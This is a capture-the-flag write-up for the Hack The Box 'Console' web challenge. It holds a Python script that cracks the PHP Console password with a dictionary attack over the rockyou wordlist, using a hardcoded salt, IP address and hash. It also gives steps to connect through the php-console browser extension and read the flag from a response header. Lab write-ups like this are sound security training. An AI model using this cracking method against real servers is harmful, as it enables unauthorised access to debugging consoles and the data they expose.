https://app.hackthebox.com/challenges/113

Description

Could you please check the console of your Chrome?

Exploitation

Copy the php-console-client cookie, decode it, and extract the publicKey. Replace pubkey and ip_address in the PoC with the extracted publicKey and the IP address displayed on the webpage.

#!/usr/bin/env python3
import hashlib

def crack():
    with open("/usr/share/dict/rockyou.txt", "r", encoding="latin-1") as infile:
        rockyou = infile.read().split()
    salt = "NeverChangeIt:)".encode()
    ip_address = "10.30.18.25".encode()
    pubkey = "370244b500c702b16dddb1678c882d2b7aa0b3bcdf94fb6bb9e792460c5d460b"
    for word in rockyou:
        try:
            password = hashlib.sha256(word.encode() + salt).hexdigest().encode()
            attempt = hashlib.sha256(ip_address + password).hexdigest()
            print("Attempt -> " + word + " - " + attempt)
            if attempt == pubkey:
                print(word)
                quit()
        except UnicodeDecodeError:
            print(word)
            continue
        except KeyboardInterrupt:
            quit()

if __name__ == "__main__":
    crack()

git clone https://github.com/barbushin/php-console-extension

go in chromium enable developer mode in chrome://extensions/

click on pack extension and select the dir of the repo php-console-extension

drag and drop the packed .crx extension

go in the webpage and send the password poohbear Your request headers reveal that PHP Console Debugging is enabled on the server, which exposes sensitive data in the php-console header. The key steps to extract useful information:

Open Developer Tools (F12) and navigate to the “Network” Tab.

Refresh the page (F5) and check the response headers php-console to retrieve the flag without needing to type it.

Summary

Console: abuse php to cross the web trust boundary and recover the flag.